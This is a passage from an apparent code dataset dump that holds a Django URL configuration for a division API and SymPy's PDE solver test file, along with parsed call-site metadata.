FCLayer, PoolingLayer, EltwiseLayer\n'), ((272, 35, 272, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(272, 46, 272, 47): '(3)', (272, 49, 272, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((274, 31, 274, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(274, 41, 274, 42): '(3)', (274, 44, 274, 45): '(3)', (274, 47, 274, 50): '(224)', (274, 52, 274, 53): '(1)'}, {}), '(3, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((275, 31, 275, 55), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(275, 41, 275, 43): '(67)', (275, 45, 275, 46): '(3)', (275, 48, 275, 51): '(224)', (275, 53, 275, 54): '(1)'}, {}), '(67, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((276, 31, 276, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(276, 41, 276, 42): '(6)', (276, 44, 276, 45): '(3)', (276, 47, 276, 50): '(224)', (276, 52, 276, 53): '(1)'}, {}), '(6, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((289, 31, 289, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(289, 39, 289, 41): '(64)', (289, 43, 289, 47): '(2000)', (289, 49, 289, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((298, 35, 298, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(298, 46, 298, 47): '(3)', (298, 49, 298, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((301, 35, 301, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(301, 46, 301, 47): '(3)', (301, 49, 301, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((311, 31, 311, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(311, 39, 311, 41): '(64)', (311, 43, 311, 47): '(2000)', (311, 49, 311, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((320, 32, 320, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(320, 43, 320, 44): '(3)', (320, 46, 320, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((322, 26, 322, 49), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(322, 36, 322, 37): '(3)', (322, 39, 322, 40): '(4)', (322, 42, 322, 45): '(224)', (322, 47, 322, 48): '(1)'}, {}), '(3, 4, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((325, 31, 325, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(325, 39, 325, 41): '(64)', (325, 43, 325, 47): '(2000)', (325, 49, 325, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((327, 31, 327, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(327, 39, 327, 43): '(3000)', (327, 45, 327, 49): '(1000)'}, {}), '(3000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((329, 31, 329, 55), 'nn_dataflow.core.EltwiseLayer', 'EltwiseLayer', ({(329, 44, 329, 48): '(1000)', (329, 50, 329, 51): '(1)', (329, 53, 329, 54): '(2)'}, {}), '(1000, 1, 2)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((331, 31, 331, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(331, 39, 331, 43): '(1000)', (331, 45, 331, 49): '(1000)'}, {}), '(1000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((344, 32, 344, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(344, 43, 344, 44): '(3)', (344, 46, 344, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((351, 35, 351, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(351, 46, 351, 47): '(3)', (351, 49, 351, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((357, 35, 357, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(357, 46, 357, 47): '(3)', (357, 49, 357, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((362, 35, 362, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(362, 46, 362, 47): '(3)', (362, 49, 362, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((49, 36, 49, 48), 'nn_dataflow.core.Layer', 'Layer', ({(49, 42, 49, 43): '(3)', (49, 45, 49, 47): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((51, 36, 51, 58), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(51, 46, 51, 47): '(3)', (51, 49, 51, 50): '(8)', (51, 52, 51, 54): '(24)', (51, 56, 51, 57): '(3)'}, {}), '(3, 8, 24, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((58, 36, 58, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(58, 47, 58, 48): '(3)', (58, 50, 58, 52): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((77, 30, 77, 56), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(77, 40, 77, 42): '(64)', (77, 44, 77, 47): '(128)', (77, 49, 77, 52): '(224)', (77, 54, 77, 55): '(3)'}, {}), '(64, 128, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((84, 30, 84, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(84, 40, 84, 41): '(3)', (84, 43, 84, 45): '(64)', (84, 47, 84, 50): '(224)', (84, 52, 84, 53): '(3)'}, {}), '(3, 64, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((93, 30, 93, 53), 'nn_dataflow.core.PoolingLayer', 'PoolingLayer', ({(93, 43, 93, 45): '(64)', (93, 47, 93, 48): '(7)', (93, 50, 93, 52): '(32)'}, {}), '(64, 7, 32)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((111, 30, 111, 52), 'nn_dataflow.core.PoolingLayer', 'PoolingLayer', ({(111, 43, 111, 45): '(64)', (111, 47, 111, 48): '(7)', (111, 50, 111, 51): '(2)'}, {}), '(64, 7, 2)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((115, 30, 115, 56), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(115, 40, 115, 42): '(64)', (115, 44, 115, 47): '(128)', (115, 49, 115, 52): '(220)', (115, 54, 115, 55): '(3)'}, {}), '(64, 128, 220, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((119, 30, 119, 53), 'nn_dataflow.core.PoolingLayer', 'PoolingLayer', ({(119, 43, 119, 45): '(32)', (119, 47, 119, 48): '(7)', (119, 50, 119, 52): '(32)'}, {}), '(32, 7, 32)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((122, 30, 122, 56), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(122, 40, 122, 42): '(32)', (122, 44, 122, 47): '(128)', (122, 49, 122, 52): '(224)', (122, 54, 122, 55): '(3)'}, {}), '(32, 128, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((129, 30, 129, 54), 'nn_dataflow.core.PoolingLayer', 'PoolingLayer', ({(129, 43, 129, 46): '(128)', (129, 48, 129, 49): '(7)', (129, 51, 129, 53): '(32)'}, {}), '(128, 7, 32)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((156, 34, 156, 51), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(156, 45, 156, 46): '(3)', (156, 48, 156, 50): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((163, 34, 163, 46), 'nn_dataflow.core.Layer', 'Layer', ({(163, 40, 163, 41): '(3)', (163, 43, 163, 45): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((165, 34, 165, 56), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(165, 44, 165, 45): '(3)', (165, 47, 165, 48): '(8)', (165, 50, 165, 52): '(24)', (165, 54, 165, 55): '(3)'}, {}), '(3, 8, 24, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n')] |
Jingil-Integrated-Management/JIM_backend | apps/division/urls.py | f0e7860d57eddaee034531a52ab91d6715d12c18 | from django.urls import path
from .views import DivisionListCreateAPIView, DivisionRetrieveUpdateDestroyAPIView, MainDivisionListAPIView
urlpatterns = [
path('division/', DivisionListCreateAPIView.as_view()),
path('division/<division_pk>', DivisionRetrieveUpdateDestroyAPIView.as_view()),
path('division/main/', MainDivisionListAPIView.as_view()),
]
| [] |
nashalex/sympy | sympy/solvers/tests/test_pde.py | aec3e6512be46f0558f5dbcf2b4d723496c91649 | from sympy import (Derivative as D, Eq, exp, sin,
Function, Symbol, symbols, cos, log)
from sympy.core import S
from sympy.solvers.pde import (pde_separate, pde_separate_add, pde_separate_mul,
pdsolve, classify_pde, checkpdesol)
from sympy.testing.pytest import raises
a, b, c, x, y = symbols('a b c x y')
def test_pde_separate_add():
x, y, z, t = symbols("x,y,z,t")
F, T, X, Y, Z, u = map(Function, 'FTXYZu')
eq = Eq(D(u(x, t), x), D(u(x, t), t)*exp(u(x, t)))
res = pde_separate_add(eq, u(x, t), [X(x), T(t)])
assert res == [D(X(x), x)*exp(-X(x)), D(T(t), t)*exp(T(t))]
def test_pde_separate():
x, y, z, t = symbols("x,y,z,t")
F, T, X, Y, Z, u = map(Function, 'FTXYZu')
eq = Eq(D(u(x, t), x), D(u(x, t), t)*exp(u(x, t)))
raises(ValueError, lambda: pde_separate(eq, u(x, t), [X(x), T(t)], 'div'))
def test_pde_separate_mul():
x, y, z, t = symbols("x,y,z,t")
c = Symbol("C", real=True)
Phi = Function('Phi')
F, R, T, X, Y, Z, u = map(Function, 'FRTXYZu')
r, theta, z = symbols('r,theta,z')
# Something simple :)
eq = Eq(D(F(x, y, z), x) + D(F(x, y, z), y) + D(F(x, y, z), z), 0)
# Duplicate arguments in functions
raises(
ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(x), u(z, z)]))
# Wrong number of arguments
raises(ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(x), Y(y)]))
# Wrong variables: [x, y] -> [x, z]
raises(
ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(t), Y(x, y)]))
assert pde_separate_mul(eq, F(x, y, z), [Y(y), u(x, z)]) == \
[D(Y(y), y)/Y(y), -D(u(x, z), x)/u(x, z) - D(u(x, z), z)/u(x, z)]
assert pde_separate_mul(eq, F(x, y, z), [X(x), Y(y), Z(z)]) == \
[D(X(x), x)/X(x), -D(Z(z), z)/Z(z) - D(Y(y), y)/Y(y)]
# wave equation
wave = Eq(D(u(x, t), t, t), c**2*D(u(x, t), x, x))
res = pde_separate_mul(wave, u(x, t), [X(x), T(t)])
assert res == [D(X(x), x, x)/X(x), D(T(t), t, t)/(c**2*T(t))]
# Laplace equation in cylindrical coords
eq = Eq(1/r * D(Phi(r, theta, z), r) + D(Phi(r, theta, z), r, 2) +
1/r**2 * D(Phi(r, theta, z), theta, 2) + D(Phi(r, theta, z), z, 2), 0)
# Separate z
res = pde_separate_mul(eq, Phi(r, theta, z), [Z(z), u(theta, r)])
assert res == [D(Z(z), z, z)/Z(z),
-D(u(theta, r), r, r)/u(theta, r) -
D(u(theta, r), r)/(r*u(theta, r)) -
D(u(theta, r), theta, theta)/(r**2*u(theta, r))]
# Lets use the result to create a new equation...
eq = Eq(res[1], c)
# ...and separate theta...
res = pde_separate_mul(eq, u(theta, r), [T(theta), R(r)])
assert res == [D(T(theta), theta, theta)/T(theta),
-r*D(R(r), r)/R(r) - r**2*D(R(r), r, r)/R(r) - c*r**2]
# ...or r...
res = pde_separate_mul(eq, u(theta, r), [R(r), T(theta)])
assert res == [r*D(R(r), r)/R(r) + r**2*D(R(r), r, r)/R(r) + c*r**2,
-D(T(theta), theta, theta)/T(theta)]
def test_issue_11726():
x, t = symbols("x t")
f = symbols("f", cls=Function)
X, T = symbols("X T", cls=Function)
u = f(x, t)
eq = u.diff(x, 2) - u.diff(t, 2)
res = pde_separate(eq, u, [T(x), X(t)])
assert res == [D(T(x), x, x)/T(x),D(X(t), t, t)/X(t)]
def test_pde_classify():
# When more number of hints are added, add tests for classifying here.
f = Function('f')
eq1 = a*f(x,y) + b*f(x,y).diff(x) + c*f(x,y).diff(y)
eq2 = 3*f(x,y) + 2*f(x,y).diff(x) + f(x,y).diff(y)
eq3 = a*f(x,y) + b*f(x,y).diff(x) + 2*f(x,y).diff(y)
eq4 = x*f(x,y) + f(x,y).diff(x) + 3*f(x,y).diff(y)
eq5 = x**2*f(x,y) + x*f(x,y).diff(x) + x*y*f(x,y).diff(y)
eq6 = y*x**2*f(x,y) + y*f(x,y).diff(x) + f(x,y).diff(y)
for eq in [eq1, eq2, eq3]:
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
for eq in [eq4, eq5, eq6]:
assert classify_pde(eq) == ('1st_linear_variable_coeff',)
def test_checkpdesol():
f, F = map(Function, ['f', 'F'])
eq1 = a*f(x,y) + b*f(x,y).diff(x) + c*f(x,y).diff(y)
eq2 = 3*f(x,y) + 2*f(x,y).diff(x) + f(x,y).diff(y)
eq3 = a*f(x,y) + b*f(x,y).diff(x) + 2*f(x,y).diff(y)
for eq in [eq1, eq2, eq3]:
assert checkpdesol(eq, pdsolve(eq))[0]
eq4 = x*f(x,y) + f(x,y).diff(x) + 3*f(x,y).diff(y)
eq5 = 2*f(x,y) + 1*f(x,y).diff(x) + 3*f(x,y).diff(y)
eq6 = f(x,y) + 1*f(x,y).diff(x) + 3*f(x,y).diff(y)
assert checkpdesol(eq4, [pdsolve(eq5), pdsolve(eq6)]) == [
(False, (x - 2)*F(3*x - y)*exp(-x/S(5) - 3*y/S(5))),
(False, (x - 1)*F(3*x - y)*exp(-x/S(10) - 3*y/S(10)))]
for eq in [eq4, eq5, eq6]:
assert checkpdesol(eq, pdsolve(eq))[0]
sol = pdsolve(eq4)
sol4 = Eq(sol.lhs - sol.rhs, 0)
raises(NotImplementedError, lambda:
checkpdesol(eq4, sol4, solve_for_func=False))
def test_solvefun():
f, F, G, H = map(Function, ['f', 'F', 'G', 'H'])
eq1 = f(x,y) + f(x,y).diff(x) + f(x,y).diff(y)
assert pdsolve(eq1) == Eq(f(x, y), F(x - y)*exp(-x/2 - y/2))
assert pdsolve(eq1, solvefun=G) == Eq(f(x, y), G(x - y)*exp(-x/2 - y/2))
assert pdsolve(eq1, solvefun=H) == Eq(f(x, y), H(x - y)*exp(-x/2 - y/2))
def test_pde_1st_linear_constant_coeff_homogeneous():
f, F = map(Function, ['f', 'F'])
u = f(x, y)
eq = 2*u + u.diff(x) + u.diff(y)
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(x - y)*exp(-x - y))
assert checkpdesol(eq, sol)[0]
eq = 4 + (3*u.diff(x)/u) + (2*u.diff(y)/u)
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(2*x - 3*y)*exp(-S(12)*x/13 - S(8)*y/13))
assert checkpdesol(eq, sol)[0]
eq = u + (6*u.diff(x)) + (7*u.diff(y))
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(7*x - 6*y)*exp(-6*x/S(85) - 7*y/S(85)))
assert checkpdesol(eq, sol)[0]
eq = a*u + b*u.diff(x) + c*u.diff(y)
sol = pdsolve(eq)
assert checkpdesol(eq, sol)[0]
def test_pde_1st_linear_constant_coeff():
f, F = map(Function, ['f', 'F'])
u = f(x,y)
eq = -2*u.diff(x) + 4*u.diff(y) + 5*u - exp(x + 3*y)
sol = pdsolve(eq)
assert sol == Eq(f(x,y),
(F(4*x + 2*y)*exp(x/2) + exp(x + 4*y)/15)*exp(-y))
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = (u.diff(x)/u) + (u.diff(y)/u) + 1 - (exp(x + y)/u)
sol = pdsolve(eq)
assert sol == Eq(f(x, y), F(x - y)*exp(-x/2 - y/2) + exp(x + y)/3)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = 2*u + -u.diff(x) + 3*u.diff(y) + sin(x)
sol = pdsolve(eq)
assert sol == Eq(f(x, y),
F(3*x + y)*exp(x/5 - 3*y/5) - 2*sin(x)/5 - cos(x)/5)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = u + u.diff(x) + u.diff(y) + x*y
sol = pdsolve(eq)
assert sol.expand() == Eq(f(x, y),
x + y + (x - y)**2/4 - (x + y)**2/4 + F(x - y)*exp(-x/2 - y/2) - 2).expand()
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = u + u.diff(x) + u.diff(y) + log(x)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
def test_pdsolve_all():
f, F = map(Function, ['f', 'F'])
u = f(x,y)
eq = u + u.diff(x) + u.diff(y) + x**2*y
sol = pdsolve(eq, hint = 'all')
keys = ['1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral', 'default', 'order']
assert sorted(sol.keys()) == keys
assert sol['order'] == 1
assert sol['default'] == '1st_linear_constant_coeff'
assert sol['1st_linear_constant_coeff'].expand() == Eq(f(x, y),
-x**2*y + x**2 + 2*x*y - 4*x - 2*y + F(x - y)*exp(-x/2 - y/2) + 6).expand()
def test_pdsolve_variable_coeff():
f, F = map(Function, ['f', 'F'])
u = f(x, y)
eq = x*(u.diff(x)) - y*(u.diff(y)) + y**2*u - y**2
sol = pdsolve(eq, hint="1st_linear_variable_coeff")
assert sol == Eq(u, F(x*y)*exp(y**2/2) + 1)
assert checkpdesol(eq, sol)[0]
eq = x**2*u + x*u.diff(x) + x*y*u.diff(y)
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(y*exp(-x))*exp(-x**2/2))
assert checkpdesol(eq, sol)[0]
eq = y*x**2*u + y*u.diff(x) + u.diff(y)
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(-2*x + y**2)*exp(-x**3/3))
assert checkpdesol(eq, sol)[0]
eq = exp(x)**2*(u.diff(x)) + y
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, y*exp(-2*x)/2 + F(y))
assert checkpdesol(eq, sol)[0]
eq = exp(2*x)*(u.diff(y)) + y*u - u
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(x)*exp(-y*(y - 2)*exp(-2*x)/2))
| [((9, 16, 9, 36), 'sympy.symbols', 'symbols', ({(9, 24, 9, 35): '"""a b c x y"""'}, {}), "('a b c x y')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((12, 17, 12, 35), 'sympy.symbols', 'symbols', ({(12, 25, 12, 34): '"""x,y,z,t"""'}, {}), "('x,y,z,t')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((21, 17, 21, 35), 'sympy.symbols', 'symbols', ({(21, 25, 21, 34): '"""x,y,z,t"""'}, {}), "('x,y,z,t')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((29, 17, 29, 35), 'sympy.symbols', 'symbols', ({(29, 25, 29, 34): '"""x,y,z,t"""'}, {}), "('x,y,z,t')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((30, 8, 30, 30), 'sympy.Symbol', 'Symbol', (), '', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((31, 10, 31, 25), 'sympy.Function', 'Function', ({(31, 19, 31, 24): '"""Phi"""'}, {}), "('Phi')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((33, 18, 33, 38), 'sympy.symbols', 'symbols', ({(33, 26, 33, 37): '"""r,theta,z"""'}, {}), "('r,theta,z')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((67, 9, 67, 22), 'sympy.Eq', 'Eq', ({(67, 12, 67, 18): 'res[1]', (67, 20, 67, 21): 'c'}, {}), '(res[1], c)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((79, 11, 79, 25), 'sympy.symbols', 'symbols', ({(79, 19, 79, 24): '"""x t"""'}, {}), "('x t')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((80, 9, 80, 35), 'sympy.symbols', 'symbols', (), '', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((81, 11, 81, 39), 'sympy.symbols', 'symbols', (), '', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((91, 8, 91, 21), 'sympy.Function', 'Function', ({(91, 17, 91, 20): '"""f"""'}, {}), "('f')", False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((119, 10, 119, 22), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(119, 18, 119, 21): 'eq4'}, {}), '(eq4)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((120, 11, 120, 35), 'sympy.Eq', 'Eq', ({(120, 14, 120, 31): 'sol.lhs - sol.rhs', (120, 33, 120, 34): '0'}, {}), '(sol.lhs - sol.rhs, 0)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((138, 10, 138, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(138, 18, 138, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((144, 10, 144, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(144, 18, 144, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((150, 10, 150, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(150, 18, 150, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((155, 10, 155, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(155, 18, 155, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((163, 10, 163, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(163, 18, 163, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((171, 10, 171, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(171, 18, 171, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((178, 10, 178, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(178, 18, 178, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((186, 10, 186, 21), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(186, 18, 186, 20): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((201, 10, 201, 35), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((215, 10, 215, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((220, 10, 220, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((225, 10, 225, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((230, 10, 230, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((235, 10, 235, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((128, 11, 128, 23), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(128, 19, 128, 22): 'eq1'}, {}), '(eq1)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((129, 11, 129, 35), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((130, 11, 130, 35), 'sympy.solvers.pde.pdsolve', 'pdsolve', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((137, 11, 137, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(137, 24, 137, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((140, 11, 140, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(140, 23, 140, 25): 'eq', (140, 27, 140, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((143, 11, 143, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(143, 24, 143, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((146, 11, 146, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(146, 23, 146, 25): 'eq', (146, 27, 146, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((149, 11, 149, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(149, 24, 149, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, 